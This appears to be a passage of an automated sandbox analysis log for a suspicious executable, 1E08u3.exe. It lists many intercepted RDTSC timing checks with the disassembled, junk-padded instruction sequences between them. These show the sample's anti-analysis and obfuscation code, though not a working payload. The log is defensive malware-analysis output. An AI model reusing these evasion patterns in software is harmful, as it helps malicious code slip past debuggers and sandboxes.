                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6DBF36 second address: 6DBF3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CFD9A second address: 6CFE47 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD3A47FEE8Ch 0x00000008 jg 00007FD3A47FEE86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov edi, ebx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a add bx, 6A87h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007FD3A47FEE88h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov eax, dword ptr [ebp+122D0FC9h] 0x00000046 jmp 00007FD3A47FEE8Eh 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007FD3A47FEE88h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Ch 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 jmp 00007FD3A47FEE99h 0x0000006c mov bx, B2A0h 0x00000070 jl 00007FD3A47FEE86h 0x00000076 push eax 0x00000077 pushad 0x00000078 push esi 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CFE47 second address: 6CFE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D1E0E second address: 6D1E18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D1E18 second address: 6D1E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D1E1C second address: 6D1E20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D1E20 second address: 6D1EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FD3A4D6CBA2h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FD3A4D6CB98h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f sub edi, 1FE56A76h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c or di, 90FFh 0x00000041 mov dword ptr [ebp+122D342Ch], ebx 0x00000047 mov eax, dword ptr [ebp+122D0D39h] 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007FD3A4D6CB98h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Bh 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 push FFFFFFFFh 0x00000069 mov dword ptr [ebp+122D2E20h], edx 0x0000006f nop 0x00000070 jnc 00007FD3A4D6CBB6h 0x00000076 push eax 0x00000077 js 00007FD3A4D6CBA2h 0x0000007d jo 00007FD3A4D6CB9Ch 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6D6D7F second address: 6D6D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Dh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6745D5 second address: 6745EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FD3A4D6CB96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD3A4D6CB9Bh 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6745EC second address: 67460A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE98h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67460A second address: 67461D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67461D second address: 674629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6E34DE second address: 6E3512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD3A4D6CBA4h 0x0000000e jmp 00007FD3A4D6CBA7h 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6E391D second address: 6E3950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FD3A47FEE91h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FD3A47FEE96h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6E3950 second address: 6E3956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6EBD4F second address: 6EBDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007FD3A47FEE92h 0x0000000d js 00007FD3A47FEE8Ch 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 js 00007FD3A47FEE9Ch 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007FD3A47FEE94h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6EBFC0 second address: 6EBFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007FD3A4D6CBA4h 0x00000010 jmp 00007FD3A4D6CB9Bh 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3A4D6CB9Fh 0x0000001f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6EBFFE second address: 6EC008 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3A47FEE8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 685260 second address: 685266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 685266 second address: 68527D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE93h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0008 second address: 6F000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F000C second address: 6F0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0012 second address: 6F0036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007FD3A4D6CB96h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD3A4D6CBA6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0036 second address: 6F0058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F064C second address: 6F0650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0650 second address: 6F0656 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0656 second address: 6F0664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0664 second address: 6F066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F07DC second address: 6F080A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD3A4D6CBA0h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F080A second address: 6F080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F099A second address: 6F099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F099E second address: 6F09A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0C2C second address: 6F0C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FD3A4D6CB98h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0DD3 second address: 6F0DEA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FD3A47FEE8Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0DEA second address: 6F0E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FD3A4D6CB9Dh 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007FD3A4D6CB9Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FD3A4D6CB96h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0E18 second address: 6F0E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0F86 second address: 6F0F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0F8A second address: 6F0F90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0F90 second address: 6F0F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F0F96 second address: 6F0FA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD3A47FEE8Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F112B second address: 6F116F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD3A4D6CBA2h 0x0000000d jnl 00007FD3A4D6CB96h 0x00000013 jbe 00007FD3A4D6CB96h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FD3A4D6CBA4h 0x00000020 push eax 0x00000021 pushad 0x00000022 popad 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F116F second address: 6F1173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12A9 second address: 6F12BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12BB second address: 6F12C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12C5 second address: 6F12C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12C9 second address: 6F12CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12CF second address: 6F12E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12E9 second address: 6F12EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12EF second address: 6F12F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F12F3 second address: 6F130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FD3A47FEE88h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4967 second address: 6F4972 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4972 second address: 6F4978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9BC2 second address: 6C9BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9BC6 second address: 6C9BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD3A47FEE95h 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9BE7 second address: 6C9BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9DB1 second address: 6C9DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9E73 second address: 6C9E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A4D6CBA8h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9E97 second address: 6C9E9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6C9E9B second address: 6C9EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 jo 00007FD3A4D6CBA4h 0x00000019 pushad 0x0000001a ja 00007FD3A4D6CB96h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA038 second address: 6CA03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA03C second address: 6CA046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA046 second address: 6CA095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c jno 00007FD3A47FEE88h 0x00000012 pop ecx 0x00000013 nop 0x00000014 jl 00007FD3A47FEE8Ch 0x0000001a mov dword ptr [ebp+122D331Bh], ecx 0x00000020 mov dword ptr [ebp+12457DF3h], ecx 0x00000026 push 00000004h 0x00000028 jo 00007FD3A47FEE8Ch 0x0000002e mov dword ptr [ebp+1248E3DCh], edi 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 jng 00007FD3A47FEE88h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA45E second address: 6CA479 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3A4D6CB98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FD3A4D6CB9Ch 0x00000015 jns 00007FD3A4D6CB96h 0x0000001b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA88D second address: 6CA893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DB9 second address: 6F4DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DBD second address: 6F4DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DC8 second address: 6F4DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD3A4D6CBA7h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DEA second address: 6F4DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DF0 second address: 6F4DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F4DF4 second address: 6F4DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F5086 second address: 6F50A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD3A4D6CBA1h 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F50A1 second address: 6F50A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F50A5 second address: 6F50C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FD3A4D6CBA0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F50C2 second address: 6F50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD3A47FEE86h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F5614 second address: 6F5618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6F5618 second address: 6F5623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
